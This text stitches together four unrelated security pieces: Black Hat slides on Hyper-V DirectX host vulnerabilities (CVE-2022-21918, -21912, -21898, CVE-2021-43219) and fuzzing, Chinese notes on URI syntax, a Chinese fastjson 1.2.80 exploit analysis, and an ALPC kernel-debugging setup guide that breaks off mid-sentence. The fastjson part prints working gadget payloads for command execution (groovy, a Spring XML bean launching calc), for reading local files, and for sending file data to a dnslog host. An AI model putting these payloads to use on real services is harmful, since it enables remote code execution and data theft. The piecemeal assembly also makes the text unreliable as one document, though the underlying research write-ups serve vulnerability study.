messages and commands from Host. #BHUSA @BlackHatEvents Information Classification: General Send dxgkrnl Command to Host ➢ There are many commands to use… ...... #BHUSA @BlackHatEvents Information Classification: General Send dxgkrnl Command to Host ➢ There are many commands to use… ➢ Command message format (header + message_buffer) offset name size 0x00 command_id 0x08 0 0x08 process 0x04 process handle or 0 0x0C channel_type 0x04 DXGKVMB_VGPU_TO_HOST(per virtual GPU DXGK channel) DXGKVMB_VM_TO_HOST(global DXGK channel) 0x10 command_type 0x04 DXGK_VMBCOMMAND_xxxxxx 0x14 reserved 0x04 Align 0x18 buffer variable Command message buffer header #BHUSA @BlackHatEvents Information Classification: General Send dxgkrnl Command to Host ➢ Example #BHUSA @BlackHatEvents Information Classification: General DXG_HOST_GLOBAL_VMBUS::VmBusxxx DXG_HOST_GLOBAL_VMBUS::VmBusxxx DXG_HOST_VIRTUALGPU_VMBUS::VmBusxxx DXG_HOST_VIRTUALGPU_VMBUS::VmBusxxx Data Receiving in Host VMBus (Root Partition) DXG_HOST_GLOBAL_VMBUS::VmBusChannelProcessPacket DXG_HOST_VIRTUALGPU_VMBUS::VmBusChannelProcessPacket VmBusProcessPacket DXG_HOST_GLOBAL_VMBUS::VmBusCommandTableVmToHost DXG_HOST_VIRTUALGPU_VMBUS::VmBusCommandTableVgpuToHost DXG_HOST_VIRTUALGPU_VMBUS::VmBusxxx DXG_HOST_GLOBAL_VMBUS::VmBusxxx ... ... #BHUSA @BlackHatEvents Information Classification: General Retrieve Data from Guest ➢ Function dxgkrnl! CastToVmBusCommand<xxxx> ➢ Example DXG_HOST_VIRTUALGPU_VMBUS::VmBusChannelProcessPacket #BHUSA @BlackHatEvents Information Classification: General Send Data to Guest ➢ dxgkrnl!VmBusCompletePacket(a1, databuffer, buflength) v6 is a NTSTATUS Value The size of NTSTATUS is 4 #BHUSA @BlackHatEvents Information Classification: General Hypervisor (Ring -1) User Mode Kernel Mode Linux VM Windows Host VMBUS (hv_vmbus.ko) DirectX LKM (dxgkrnl.ko) Application /dev/dxg vmcall Application Runtime Component UserMode Driver VMBUS Component DirectX graphics kernel subsystem (dxgkrnl.sys) DirectX graphics MMS (dxgmms1.sys & dxgmms2.sys) GPU driver vmcall 1 2 3 4 5 6 7 Attack Surface #BHUSA @BlackHatEvents Information Classification: General Attack Surface ➢ dxgkrnl.sys dxgmms1.sys dxgmms2.sys ➢ 66 DXG_HOST_VIRTUALGPU_VMBUS commands ➢ 21 DXG_HOST_GLOBAL_VMBUS commands ... #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Case Studies CVE-2022-21918 NULL Pointer Reference:DXGK_VMBCOMMAND_SIGNALSYNCOBJECT #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 ➢Root cause : dxgmms2!VidSchiSignalSyncObjectsFromCpu a5(5th parameter) reference a NULL Pointer. #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 DXG_HOST_VIRTUALGPU_VMBUS::VmBusSignalSyncObject #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 DXG_HOST_VIRTUALGPU_VMBUS::VmBusSignalSyncObject If v22 < v17_Length_MonitoredFenceValueArray Then v24_pfence_values = 0 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 DXG_HOST_VIRTUALGPU_VMBUS::VmBusSignalSyncObject #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 DXG_HOST_VIRTUALGPU_VMBUS::VmBusSignalSyncObject offset name size 0x00 command 0x18 0x18 object_count 0x04 0x1C flags 0x04 0x20 context_count 0x04 0x24 reserved 0x04 0x28 fence_value 0x08 0x30 device 0x08 0x38 ObjectHandleArray[object_count] 4 * object_count ContextArray[context_count] 4 * context_count MonitoredFenceValueArray[object_count] 8 * object_count #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 DXG_HOST_VIRTUALGPU_VMBUS::VmBusSignalSyncObject If v10_objectcount = 1, v16_buflen = 0x3c v17_Length_MonitoredFenceValueArray = 8 v18_Offset_MonitoredFenceValueArray = 0x3c V22 = 0 v22 < v17 v24_pfence_values = 0 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21918 PoC Code ① Create a sync_handle ② Trigger this bug, and BSOD! #BHUSA @BlackHatEvents Information Classification: General Case Studies CVE-2021-43219 NULL Pointer Reference: DXGK_VMBCOMMAND_SUBMITCOMMAND #BHUSA @BlackHatEvents Information Classification: General CVE-2021-43219 DxgkSubmitCommandInternal #BHUSA @BlackHatEvents Information Classification: General CVE-2021-43219 DXGCONTEXT::HandleVistaBltStub If a2_present_history_token < 0 Into this branch and then invoke CWin32kLocks::Lock &v71 is a CWin32kLocks structure pointer. Some members of the CWin32kLocks structure are illegal now, cause BSOD #BHUSA @BlackHatEvents Information Classification: General CVE-2021-43219 PoC Code ① Create context ② Trigger this bug #BHUSA @BlackHatEvents Information Classification: General CVE-2021-43219 Debugging #BHUSA @BlackHatEvents Information Classification: General Case Studies CVE-2022-21912 Arbitrary Address Read: DXGK_VMBCOMMAND_WAITFORSYNCOBJECTFROMGPU #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21912 DXG_HOST_VIRTUALGPU_VMBUS::VmBusWaitForSyncObjectFromGpu offset name size 0x00 command 0x18 0x18 context 0x04 0x1C object_count 0x04 0x20 legacy_fence_object 0x08 0x28 fence_values 0x08 0x30 ObjectHandles 4 * object_count #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21912 DXG_HOST_VIRTUALGPU_VMBUS::VmBusWaitForSyncObjectFromGpu offset name size 0x00 command 0x18 0x18 context 0x04 0x1C object_count 0x04 0x20 legacy_fence_object 0x08 0x28 fence_values 0x08 0x30 ObjectHandles 4 * object_count If legacy_fence_object = 1 Dst.pFenceValue = v6_databuf->syncgpu.fence_value V23 = 0 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21912 DxgkWaitForSynchronizationObjectFromGpuInternal v5_a4 is 0 now, into this branch v5_a4 = Src.pFenceValue #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21912 WaitForSynchronizationObjectFromGpu #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21912 PoC Code ① Create context handle ② Create sync handle ③ Trigger this bug, read from address : 0x4141414141414141 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21912 Debugging #BHUSA @BlackHatEvents Information Classification: General Case Studies CVE-2022-21898 Arbitrary Address Write: DXGK_VMBCOMMAND_SUBMITVAILPRESENTHISTORYTOKEN #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 DXG_HOST_VIRTUALGPU_VMBUS::VmBusSubmitVailPresentHistoryToken offset name size 0x00 command 0x18 0x18 context_handle 0x04 0x1C unknown1_off4 0x04 0x20 unknown2_off8 0x08 0x28 unknown3_off10 0x08 0x30 unknown4_off18 0x08 0x38 unknown5_off20 0x08 0x40 device_synchandle 0x04 0x44 unknown6_off2C 0x04 databuf memory layout #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 DXGADAPTER::SubmitPresentHistoryTokenFromVm #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 VidSchSubmitCommandContextless #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 VidSchiRedirectedFlipWaitOnSyncObject #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 VidSchiAcquirePrivateDataReference When v2 = 0, v4 = *(_QWORD *)((char *)a2 + 0xC8) In VidSchiRedirectedFlipWaitOnSyncObject, v6 + 0x238 In DXGADAPTER::SubmitPresentHistoryTokenFromVm v4 is a7_unknown4_off18 #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 PoC Code ① Create sync handle ② Trigger this bug, write to address : 0x414141414141414d #BHUSA @BlackHatEvents Information Classification: General CVE-2022-21898 Debugging #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Why Fuzz? ➢ Hyper-V DirectX Component has a large quantity of codes. ➢ There are 87 commands and their corresponding structures, mutating members in a specific struct can be very effective. ➢ Many commands depend on context, such as some commands depend on device_handle, allocation_handle, etc. Meanwhile, the properties of the handle, such as the properties of the allocation_handle, will also affect the commands that refer to it below. In this case, it is more efficient to use fuzz. ➢ The above vulnerabilities were all discovered by fuzz. #BHUSA @BlackHatEvents Information Classification: General Fuzz Architecture Hypervisor Host (Root Partition) Guest (Child Partition) dxgmms1.sys dxgmms2.sys dxgkrnl.sys dxgkrnl.ko UserMode KernelMode fuzzer r&w /dev/dxg ioctl(LX_DXPWN) • Send mutated dxgkrnl command data. • Receive data returned from the kernel module, such as the return data of create allocation command. ioctl(LX_DXPWN) ---- agent layer • Send the dxgkrnl command data obtained from the usermode program to the host DirectX component. • Receive data from host DirectX component and return data to usermode program. #BHUSA @BlackHatEvents Information Classification: General Fuzz Architecture Hypervisor Host (Root Partition) Guest (Child Partition) dxgmms1.sys dxgmms2.sys dxgkrnl.sys dxgkrnl.ko UserMode KernelMode fuzzer r&w /dev/dxg ioctl(LX_DXPWN) • Send mutated dxgkrnl command data. • Receive data returned from the kernel module, such as the return data of create allocation command. ioctl(LX_DXPWN) ---- agent layer • Send the dxgkrnl command data obtained from the usermode program to the host DirectX component. • Receive data from host DirectX component and return data to usermode program. fuzzer Harness Data Send/Recv Infrastructure #BHUSA @BlackHatEvents Information Classification: General Example Hypervisor Host (Root Partition) Guest (Child Partition) dxgmms1.sys dxgmms2.sys dxgkrnl.sys dxgkrnl.ko UserMode KernelMode fuzzer r&w /dev/dxg ioctl(LX_DXPWN) • Send mutated dxgkrnl command data. • Receive data returned from the kernel module, such as the return data of create allocation command. ioctl(LX_DXPWN) ---- agent layer • Send the dxgkrnl command data obtained from the usermode program to the host DirectX component. • Receive data from host DirectX component and return data to usermode program. DXGK_VMBCOMMAND_SIGNALSYNCOBJECT Mutation dxgkvmb_command_signalsyncobject structure member #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Conclusion ➢ The Hyper-V DirectX Component has a large attack surface and is still being updated so far. ➢ Hyper-V DirectX Component application scenarios include: WDAG, Windows Sandbox, and HoloLens 2 emulator. Since virtual machines can natively support DirectX, online 3D gaming may become possible in the future I guess. ➢ 🙁Unfortunately, MSRC thinks Hyper-V DirectX is out of scope for Hyper-V bounty program(Thanks MSRC for the patient communication). But it's still a good remote attack surface. #BHUSA @BlackHatEvents Information Classification: General Black Hat Sound Bytes ⚫Hyper-V DirectX component architecture overview, and how to enable DirectX component in Hyper-V virtual machine configuration. ⚫Introduce the attack surface of Hyper-V DirectX component, and how to find vulnerabilities in this attack surface through fuzzing. ⚫Discloses the internal details of 4 Hyper-V DirectX component’s vulnerabilities, providing reference for finding vulnerabilities in this new attack surface. #BHUSA @BlackHatEvents Thank you! Zhenhao Hong (@rthhh17) Ziming Zhang (@ezrak1e) #BHUSA @BlackHatEvents Q & A Zhenhao Hong (@rthhh17) Ziming Zhang (@ezrak1e)
URI相关 0x00 前⾔ 最近看了⼀些关于url的⼩技巧,感觉⾃⼰对url的相关基础其实搞不太清楚,所以⼲脆从头仔细再学⼀遍。 主要参考⼀些链接 https://datatracker.ietf.org/doc/html/rfc3986#section-1.1 https://docs.oracle.com/javase/8/docs/api/java/net/URI.html https://blog.csdn.net/anguowei/article/details/118381316 0x01 什么是uri、url、urn uri(uniform resource identifier),统⼀资源标识符,⽤于标识⽹络上任意资源。 url(uniform resource locator),统⼀资源定位符,通常表示资源的位置、获取⽅式等。 urn(uniform resource name),统⼀资源名称,表示⽹络上唯⼀存在的资源名称,即使资源不存在了,⼈们也可以继续使⽤名称讨论他。 其三者的关系如下图: 很显然,urn和url只是uri的两个⼦集,uri也还会包含其他的⼀些分类,不过那些分类很⼩众基本⽤不到。也就是说⼤部分时候我们看到的就 是url和urn,⽽最最常⻅的⽐如⽹址等就是url,⽽我们在磁⼒链接中则会看到urn的身影。 再通俗点说,urn就像⼀个资源的名字,⽐如⼀部蜘蛛侠电影,我们在现实社会中会叫这部电影《蜘蛛侠》,当我们说这个名字的时候别⼈也 会知道说的是这部电影。⽽在⽹络世界中,针对某个唯⼀的资源⽐如蜘蛛侠电影的名字⽤⼀串urn来唯⼀标识。这样⽆论在哪个⽹站,当我们 提到这个urn的时候,该⽹站通过解析就能知道我们说的是蜘蛛侠电影。 那么url是什么呢?⽐如我们去A站和B站分别搜索蜘蛛侠电影,他们会各⾃返回各⾃⽹站上的蜘蛛侠电影播放链接,⽽这两个链接肯定是不相 同的,因为他们分别指向A站和B站⾃⼰服务器上的某个蜘蛛侠电影的资源副本,并且告诉⽤户如何去访问(⽤什么参数,在那个⽬录下 等)。很显然,url就是指代具体资源的位置、访问⽅法等,同⼀个urn可能对应⽹络上N个url,因为《蜘蛛侠》电影的副本资源在各⼤⽹站上 都有。 0x02 格式 前⾯说了主要的uri分为urn和url两⼤类,给出⼀些例⼦ ftp://ftp.is.co.za/rfc/rfc1808.txt http://www.ietf.org/rfc/rfc2396.txt ldap://[2001:db8::7]/c=GB?objectClass?one mailto:John.Doe@example.com news:comp.infosystems.www.servers.unix tel:+1-816-555-1212 telnet:// urn:oasis:names:specification:docbook:dtd:xml:4.1.2 其具体格式如下 上图是rfc中的解释,不过他的图显示有问题,所以可以看下⾯这个 foo://example.com:8042/over/there?name=ferret#nose \_/ \______________/\_________/ \_________/ \__/ | | | | | scheme authority path query fragment | _____________________|__ / \ / \ urn:example:animal:ferret:nose 相信很多同学多少有点基础,所以上⾯有些就不再说了,看⼀下authority: authority = [ userinfo "@" ] host [ ":" port ] authority由//标识开始,并在下⼀个/或者#或者?或者末尾时结束。 总之只要知道//开始的是authority的标识,当然authority可以为空,这样我们就可以很好理解file:///etc/passwd这种形式了,也就是说 authority为空然后后⾯跟上path因此会有三个/。 这⾥最后再提⼀个概念:SchemeSpecificPart [scheme:]scheme-specific-part[#fragment] 0x03 不透明和分级uri uri也可以分为不透明的和分级的uri两⼤类。 如果⼀个uri的scheme-spcific-part不以/开头,则称他为不透明的,通常这种uri的scheme-spcific-part部分不会再做进⼀步的解析(可能对 应的scheme⾃⼰有专属的解析器来解析,但⾄少不会按照通常那样来解析各个部分)。例⼦如下: mailto:java-net@java.sun.com news:comp.lang.java urn:isbn:096139210x 分级URI就是我们经常⻅的那种,scheme后⾯以/开头或者是没有scheme的相对uri都属于分级uri,会按照前⾯说的格式来尝试解释各个部 分。例⼦如下: http://java.sun.com/j2se/1.3/ docs/guide/collections/designfaq.html#28 ../../../demo/jfc/SwingSet2/src/SwingSet2.java file:///~/calendar 0x04 java实例 写⼏个简单的java实例处理scheme的效果,我这⾥是java1.8 ⽐较有意思的是,这⾥获取port的时候必须要显示的写80,不然会获取port为-1,也就是说这个类在处理的时候还是正则匹配的样⼦,不会 做更多的处理。 看看file协议: 0x05 normalize和resolve 在uri的处理⾥有两个操作要提⼀下,⼀个是normalize另⼀个是resolve。 normalize 将路径中的.和..给处理掉,如果路径为a/b/../c则会被处理成a/c resolve 将两个路径链接在⼀起,⽐如a/b和c/d链接后变成a/b/c/d 0x06 可能有⽤的点 scheme的构成: scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) 这⾥可以看到scheme可以带有. 那么假设只校验格式不校验是否有对应的protocol handler,那么链接也可能写成 www.baidu.com://www.guahao.com/a/b/c 相对url: 在存在baseurl的上下⽂⾥,可以⽤相对url来表示url,类似于使⽤相对路径 https://datatracker.ietf.org/doc/html/rfc3986#section-5.4.1 这后⾯还有⼀些异常的例⼦处理建议可以看看,蛮有意思的 0x07 结语 暂时先记⼀下这些,rfc⾥还有很多其他概念和细节,有空再看看。⽽且java在处理的时候,好像也没有完全按照rfc的标准来处理。
2022/9/27 19:20 Markdoc Preview about:blank 1/12 学习⼀下浅蓝的《Hacking JSON》议题。 回顾fastjson历史漏洞 fastjson1.2.47是通过MiscCodec向⽩名单缓存中put任意类。 fastjson1.2.68是⽤的期望类, 找实现了AutoCloseable接⼝的⼦类中的危险操作。 1.2.68的修复⽅式简单粗暴,将 java.lang.Runnable 、 java.lang.Readable 和 java.lang.AutoCloseable 加⼊了⿊名单,那么1.2.80⽤的就是另⼀个期望类:异 常类Throwable。 2022/9/27 19:20 Markdoc Preview about:blank 2/12 详细分析 浅蓝给了两张图说明他的挖掘思路。 关键点就在于反序列化setter method parameter OR public field(⽆视autotype)时添加类到⽩名单 2022/9/27 19:20 Markdoc Preview about:blank 3/12 给了上图的挖掘思路,那么我们就要弄明⽩为什么setter参数、公有字段、构造函数参数这三个点的类型会被加到⽩名单缓存mapping中。 先写⼏个demo来看 import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.util.TypeUtils; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.concurrent.ConcurrentMap; public class Main { public static void main(String[] args) throws Exception { String json2 = new String(Files.readAllBytes(Paths.get("1.txt"))); try { Object parse = JSON.parse(json2); System.out.println(parse); } catch (Exception e) { e.printStackTrace(); } Field mappings = TypeUtils.class.getDeclaredField("mappings"); mappings.setAccessible(true); ConcurrentMap<String, Class<?>> o = (ConcurrentMap<String, Class<?>>) mappings.get(TypeUtils.class); System.out.println("----------------"); o.forEach((k, v) -> { if (k.contains("My")) { System.out.println(k); } }); } } public class MyClass { public String name; } public class MyException extends Throwable { private MyClass clazz; public void setClazz(MyClass clazz) { this.clazz = clazz; } } 我们构造⼀个json来讲解漏洞原理 { "a":{ "@type":"java.lang.Exception", 2022/9/27 19:20 Markdoc Preview about:blank 4/12 "@type":"MyException", "clazz":{}, "stackTrace":[] }, "b":{ "@type":"MyClass","name":"asd" } } a部分就是众所周知的期望类,⽤继承了Exception的MyException类作为type。 在 com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class<?>, int) 中 expectClassFlag为true,所以会从classloader中加载MyException拿到class 并且期望类不为空时会把⽬标类加⼊到类缓存中 TypeUtils.addMapping(typeName, clazz) 解决完两个type标签之后,现在来看clazz标签的解析过程 因为是异常类,所以在 com.alibaba.fastjson.parser.DefaultJSONParser#parseObject(java.util.Map, java.lang.Object) 拿到的是ThrowableDeserializer 反序列化器 深究getDeserializer函数 如果是type传⼊的是Class则进⼊ com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type) 2022/9/27 19:20 Markdoc Preview about:blank 5/12 这个函数中会针对不同类的class类型分配相应的反序列化器 并且最终都会将type和deserializer的对应关系put到⾃身的deserializers map中 com.alibaba.fastjson.parser.ParserConfig#putDeserializer 拿到对应的反序列化器之后进⼊ com.alibaba.fastjson.parser.deserializer.ThrowableDeserializer#deserialze 2022/9/27 19:20 Markdoc Preview about:blank 6/12 先createException通过构造函数创建异常实例,然后通过getDeserializer拿到对应的反序列化器,然后⽤反序列化器拿到对应字段的字段反序列化实例FieldDeserializer 如果value不是fieldClass类型的会进 ⼊ com.alibaba.fastjson.util.TypeUtils#cast(java.lang.Object, java.lang.reflect.Type, com.alibaba.fastjson.parser.ParserConfig) 进⾏类型转 换 多次判断之后会进 ⼊ com.alibaba.fastjson.util.TypeUtils#cast(java.lang.Object, java.lang.Class<T>, com.alibaba.fastjson.parser.ParserConfig) 2022/9/27 19:20 Markdoc Preview about:blank 7/12 在这个函数中会根据传⼊对象的具体类型来进⾏对应的类型转换操作,因为我们传⼊的是 "clazz":{} 也就是⼀个JSONObject,所以⾛到Map的类型转换,进⼊ com.alibaba.fastjson.util.TypeUtils#castToJavaBean(java.util.Map<java.lang.String,java.lang.Object>, java.lang.Class<T>, com.alibaba.fastj 在这⾥⼜⼀次进⼊getDeserializer,⽽此时参数是MyException类clazz字段的类型,即MyClass。 那么重点来了,此时在 com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type) 函数中 调⽤⾃身putDeserializer函数,填充ParserConfig⾃身的 this.deserializers.put(type, deserializer) ⽽在 com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class<?>, int) 中 2022/9/27 19:20 Markdoc Preview about:blank 8/12 在反序列化json中的b标签时,对 "@type":"MyClass" 进⾏checkAutoType时就能拿到MyClass类⽽不会抛出异常了。 到此分析结束。捋⼀下思路,根据异常类作为期望类时,会先⽤构造函数创建出MyException实例,然后绑定对应字段,调⽤setter。⽽字段类型MyClass在进⼊ getDeserializer函数时会被put到ParserConfig的deserializers列表中,这样造成在checkautotype时可以通过deserializers拿到对应的MyClass类⽽不会为null。 类字段如此,构造函数的参数和setter的参数应该也是⼤差不差。 修复 1. https://github.com/alibaba/fastjson/commit/35db4adad70c32089542f23c272def1ad920a60d 2. https://github.com/alibaba/fastjson/commit/8f3410f81cbd437f7c459f8868445d50ad301f15 除了⿊⽩名单的变化以外就是直接端掉异常类这条路。 并且在加类缓存时多了⼀次autotype判断 2022/9/27 19:20 Markdoc Preview about:blank 9/12 gadget 整理⼀下poc,⼀些探测版本、探测依赖什么的懒得弄了。 groovy 依赖groovy { "@type":"java.lang.Exception", "@type":"org.codehaus.groovy.control.CompilationFailedException", "unit":{} } { "@type":"org.codehaus.groovy.control.ProcessingUnit", "@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit", "config":{ "@type":"org.codehaus.groovy.control.CompilerConfiguration", "classpathList":"" } } META-INF/services/org.codehaus.groovy.transform.ASTTransformation ⽂件中写Evil,然后创建⼀个Evil类写⾃⼰的命令执⾏代码。 jdbc 依赖jython+postgresql+spring-context { "a":{ "@type":"java.lang.Exception", "@type":"org.python.antlr.ParseException", "type":{} }, "b":{ "@type":"org.python.core.PyObject", "@type":"com.ziclix.python.sql.PyConnection", "connection":{ "@type":"org.postgresql.jdbc.PgConnection", "hostSpecs":[ { "host":"", "port":2333 } ], "user":"user", "database":"test", "info":{ 2022/9/27 19:20 Markdoc Preview about:blank 10/12 "socketFactory":"org.springframework.context.support.ClassPathXmlApplicationContext", "socketFactoryArg":"" }, "url":"" } } } <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String" > <value>cmd</value> <value>/c</value> <value>calc</value> </list> </constructor-arg> <property name="whatever" value="#{pb.start()}"/> </bean> </beans> aspectj 分三次打 { "@type":"java.lang.Exception", "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" } 2022/9/27 19:20 Markdoc Preview about:blank 11/12 { "@type":"java.lang.Class", "val":{ "@type":"java.lang.String"{ "@type":"java.util.Locale", "val":{ "@type":"com.alibaba.fastjson.JSONObject", { "@type":"java.lang.String" "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException", "newAnnotationProcessorUnits":[{}] } } } { "x":{ "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", "fileName":"c:/windows/win.ini" } } 回显可以⽤报错或者dnslog,只改第三部分的payload为 2022/9/27 19:20 Markdoc Preview about:blank 12/12 { "@type":"java.lang.Character" { "c":{ "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", "fileName":"c:/windows/win.ini" } } dnslog win平台下我没成功 { "a": {"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit","@type":"org.aspectj.org.eclipse.jdt.int ernal.core.BasicCompilationUnit","fileName":"1.txt"}, "b":{"@type":"java.net.Inet4Address","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val": {"@type":"com.alibaba.fastjson.JSONObject",{ "@type": "java.lang.String""@type":"java.util.Locale","language":{"@type":"java.lang.String" {"$ref":"$"},"country":"x.xnfhnufo.dnslog.pw"}} }} su18整理了很多payload在他的GitHub上,放个链接在这 参考 1. 《Hacking JSON》 2. https://hosch3n.github.io/2022/09/01/Fastjson1-2-80%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/ 3. https://moonsec.top/articles/112 4. https://github.com/su18/hack-fastjson-1.2.80
Debugging and Reversing ALPC Contents: Introduction & Disclaimer Environment Preparation Getting Off The Ground From User to Kernel Land Hunting An ALPC Object Introduction & Disclaimer This post is an addendum to my journey to discover and verify the internals of ALPC, which I’ve documented in Offensive Windows IPC Internals 3: ALPC. While preparing this blog I figured a second post, explaining the debugging steps I took to verify and discover ALPC behaviour, could be useful to all of us that are beginners in the field of reverse engineering and/or debugging. While I’ve certainly used the techniques and methods shown in this post below, these where not my only resources and tools to dive into ALPC. Even implying this would undermine the important and major work of other researchers that have documented and reversed ALPC internals in the past, like Alex Ionescu and many others. Hence this disclaimer. TL;DR: The techniques below are practical and useful, but I was only able to apply them due to the work of others. Another important disclaimer is: I am - by no means - an experienced reverse engineer and this blog post is not meant to be an introduction into ‘how to become a reverse engineer’ or show a smart way to get in this field. This is a ‘use Windows debugging to stumble into a topic and make your way to look around’ post. Environment Preparation In order to follow the steps shown below you want to set up a kernel debugging environment. If you already have a kernel debugging environment set up, feel free to skip to section Getting Off The Ground. If you don’t, you’ve got two basic choices for this setup: Local live kernel debugging Remote kernel debugging Although the local kernel debugging option only requires a single test machine (virtual VM) and only a single command and a reboot to set you up, I nevertheless recommend starting two machines (VMs) and set up for remote debugging. The reason for this is that local live kernel debugging comes with some constrains and you can’t use the full debugging feature set and can’t go all routes. I’ll nevertheless include the steps to set up local kernel debugging as well, in case you only have a single machine at hand in your test environment. Setup local kernel debugging The following steps needs to be done: 1. Start up your testing machine or VM Local Kernel Debugging with WinDbg 2. If you do not already have WinDbg installed, download and install the WindowsSDK from here to install WinDbg. Alternatively you can also use the WinDbg Preview from the Windows Store App. 3. Open up PowerShell with administrative privileges and run the following command to enable local kernel debugging: PS:> bcdedit /debug on & bcdedit /dbgsettings local 4. Reboot your machine 5. Open up WinDbg and enter local kernel debugging mode by running the following command: .\windbg.exe -kl Alternatively you can also open up the WinDbg GUI, click File » Kernel Debug (Ctrl+K) » Local (Tab) » Ok A note about the customized layout shown above In my case I like to have my debugging windows positioned and aligned in a certain way (and also have the colors mimic a dark theme). You can do all of that by starting WinDbg, open up and position all Windows the way you like them, change the coloring (if you want) under View » Options » Colors and finally save all your Workspace setup via File » Save Workspace to File. Once done, you can open up your local kernel debugging WinDbg with your customized Workspace as follows: .\windbg.exe -WF <Path-To-File>.WEW -kl All WinDbg command line switches can be found here Setup remote kernel debugging 1. Start your first testing machine or VM that you want to debug, this will be referred to as debuggee machine. 2. If you do not already have kdnet.exe installed, download and install the WindowsSDK from here to install it. 3. Open up PowerShell with administrative privileges and run the following command: cd "C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\\" && .\kdnet.exe <DEBUGER-IP> <RandomHighPortNumber>' I usually use *51111 as port number. This command will give you command line instructions to use from your debugger, see step 6.* 4. Start your second testing machine or VM that you want to use to debug your first VM, this will be referred to as debugger machine. 5. If you do not already have WinDbg installed, download and install the WindowsSDK from here to install it. Alternatively you can also use the WinDbg Preview from the Windows Store App. 6. Run the following command to start WinDbg and attach it to your debuggee machine: cd "C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\" && .\windbg.exe -k <PASTE-OUTPUT-FROM-kdnet.exe-FROM-YOUR-DEBUGGEE> . The command to paste from kdnet.exe (Step 3.), will look something like this: net:port=<YOUR- RANDOM-PORT>,key=.... You will see a prompt indicating that the debugger is set up and is waiting to be connected. 7. Reboot the debuggee machine. Switch back to your debugger machine, which will connect during the boot process of your debuggee. You may have noted that I’ve mentioned the WinDbg Preview store app as an alternative to the classic WinDbg debugger. This preview version is a facelift version of the classic debugger and comes with quite a different UI experience (including a built-in dark-theme). If you’re looking at a one-time setup and are not emotionally attached to the old/classic WinDbg I encourage you to try the WinDbg Preview. The only reason I’m not using it yet is due to the fact that you can’t export your Workspace setup (window layout), which is a crucial feature for me in my lab (which i rebuild frequently). As a result of that I will be using classic WinDbg in the below Setting up symbols Once you’ve setup WinDbg the last preparation step you’ll need to take is to setup your debugger to pull debugging symbols form Microsoft’s official symbol server. Run the following set of commands within WinDbg to set up symbols: WinDbg .sympath check 1. Within WinDbg run .sympath to show your current symbol path configuration. If it looks similar to the below, which specifies that you want your symbols to be loaded from Microsoft’s symbol server and cache those in C:\Symbols, you’re good to go… 2. If your output does not look like this and you simply want to pull all your symbols from Microsoft’s official symbol server, run the following command within WinDbg: .sympath srv*https://msdl.microsoft.com/download/symbols More about symbol servers, caching and the how & why can be found in Microsoft’s documentation page here. Getting Off The Ground Let’s say we know nothing at all about ALPC and want to start digging and understanding how ALPC works under the hood. As ALPC is undocumented we cannot start our journey by sticking our head into Microsoft’s rich documentation catalogues, but instead we have to a apply a methodology that is based on a loop of reversing, making assumptions, testing assumptions and verification/falsification of assumptions to finally build our picture of ALPC. Listing ALPC functions Alright, if we do not know anything about a technology beside its name (ALPC), we can 